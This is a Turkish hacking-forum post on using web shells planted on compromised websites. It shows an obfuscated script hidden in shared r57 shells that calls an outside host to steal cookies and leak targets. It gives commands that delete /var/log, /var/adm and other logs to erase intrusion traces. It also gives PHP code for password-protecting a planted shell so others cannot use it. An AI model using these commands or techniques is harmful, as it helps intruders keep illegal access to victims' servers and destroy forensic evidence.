Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Shellde Log Güvenliği Videolu
#1
Shelle şifre koyma videosu = http://www.youtube.com/watch?v=9XHBPrp2wecs

Kullandığınız shell Scriptlerin de kötü niyetli kişiler Logger koyarak,sizin shell ile girdiği adresi Logluyor.
Log tutan kişinin shell Scriptini kullanın ama log gitmesin,peki bunu nasıl yaparız ?

İlk Olarak Loggerli shell'i deniyelim.[/B]

www.deccal.org

Shell ile girdiğiniz varsayarak devam ediyorum.

Ve Log Sayfası;


www.deccal.org

Yukarıda sayfa Loggerli shell kullanılan adres IP ve kullanan hakkında bazı özellikleri bize Logluyor.

Şimdi isterseniz bunu engellemeye çalışalım.

Firefox NoScript eklentisini kurarsaniz JS kodlarını engeller,


[URL="https://addons.mozilla.org/en-US/firefox/addon/722"]https://addons.mozilla.org/en-US/firefox/addon/722[/URL]
Adresinden indirebilirsiniz.

Shell ile girdiğinizde alt tarafta böyle bir uyarı alırsanız kullandığınız shellin Log tuttuğuna emin olabilirsiniz.


www.deccal.org


NoScript Eklentisi kurulu olduğu zaman Logsuz istediğiniz shell adresini kullanabilirsiniz

şimdi logları sılmemız gerekecek
bun ları şu kodlarla yapın bazı larını aklımda tutamam onun ıcın not defterıen kopyaladım hep

rm - rf /var/log
rm - rf /var/adm
find/- name .bash_logout - exec rm - rf {} \\;
find/- name *.log - exec rm - rf {} \\;[/B]


Kod:
bir shellin log tutup tutmadığını anlamak için
Öncelikle log tutan shellin ne özelliği var onu anlatayım.
Diyelimki sizde bir shell var.Ve siteye shell sokacaksınız veya RFI ile bağlanacaksanız.Eğer shell sokar veya RFI ile bağlanırsanız
shell yayını yapan siteye sizin hackliyeceğiniz sitenin adresi gider.Gidincede site sahibi sizin soktuğunuz shelli görür ve shelle bağlanır.
Anlıyacağınız siteyi tek hackliyecek olan siz olmazsınız.
Log Tutan site nasıl anlaşılır?
Arkadaşlar öncelikle shell yayını yapan sitemize bağlanalım.
Örneğin;
www.deneme12345.com/yayin/r57.txt
Shelle bağlandıktan sonra ctrl+f yapıyoruz.
Karşınıza küçük bir arama bölümü çıkacak.Arama boşluğuna <script yazıp enterlıyoruz.Karşınıza aşağıdaki yazılar gelene kadar
enterlayın.Eğer aşağıda yazıklarım karşınıza çıkarsa.Bilinki site log tutuyor demektir.
-------------------------------------------------------------
<script type="text/javascript">document.write(***8217;\\u003c\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u0020\\u0053\\u0052\\u0043\\u003d\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0077\\u0077\\u0077\\u002e\\u006d\\u0065\\u0074\\u0061\\u006c\\u0074\\u0065\\u0061\\u006d\\u002e\\u006f\\u0072\\u0067\\u002f\\u0062\\u0061\\u0074\\u0061\\u006b\\u002f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u006a\\u0073\\u003e\\u003c\\u002f\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u003e***8217;)</script>
<?php
ve
<SCRIPT SRC=http://www.siteadresi.org/yayin/ciz.js></SCRIPT>
-------------------------------------------------------------
Bu gördüğünüz kodlar karşınıza çıkarsa shellinizi silin gitsin.


Sen çözüm olarak Shelle şifre koy kimse bişey yapamaz.

Kod:
<?
# Konfigurasyon
$sayfaSifreleme =***8217;1***8242;; # 1 acik , 0 kapali
$kullaniciAdi = ***8216;KingSkrupellos***8217;;
$sifre = ***8216;MHT***8217;;
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != ***8220;$kullaniciAdi***8221; || $_SERVER['PHP_AUTH_PW'] != ***8220;$sifre***8221;) {
header(***8216;WWW-Authenticate: Basic realm=***8221;x***8221;***8216;);
die(header(***8216;HTTP/1.0 401 Unauthorized***8217;));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme ==***8217;1***8242;) {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
PHP- Kodu:
$kullaniciAdi = KingSkrupellos
$sifre = ***8216;MHT***8217;;


bölümüne gelin sonra kullanıcı adı ve şifrenizi kendinize göre düzenleyin.Düzenleme işleminden sonra kodların tamamanı kopyalayıp shell kodlarınızın başına ekleyip kaydedin. Artık Shellinizi attığınız serverda çalıştırırken şifre soracaktır.

Nette buldum hepsini biraraya getirmek istedim.
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım KingSkrupellos 8 2,269 30-11-2016, Saat: 19:52
Son Yorum: Kolonkun
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 2 225 30-11-2016, Saat: 11:11
Son Yorum: Efetimi
  WordPress File Download Vulnerability (Videolu Anlatım) Mr.F92 25 1,018 27-11-2016, Saat: 20:23
Son Yorum: AhmetGazi
  Windows Server Root Kısa Videolu Anlatım KingSkrupellos 7 150 21-11-2016, Saat: 13:06
Son Yorum: Gardiyan
  Sisteminizdeki Config.Php Güvenliği ve Şifreleme KingSkrupellos 0 110 01-07-2016, Saat: 02:50
Son Yorum: KingSkrupellos
Anahtar Kelimeler

Shellde Log Güvenliği Videolu indir, Shellde Log Güvenliği Videolu Videosu, Shellde Log Güvenliği Videolu Online izle, Shellde Log Güvenliği Videolu Bedava indir, Shellde Log Güvenliği Videolu Yükle, Shellde Log Güvenliği Videolu Hakkında, Shellde Log Güvenliği Videolu Nedir, Shellde Log Güvenliği Videolu Free indir, Shellde Log Güvenliği Videolu Oyunu, Shellde Log Güvenliği Videolu Download


1 Ziyaretçi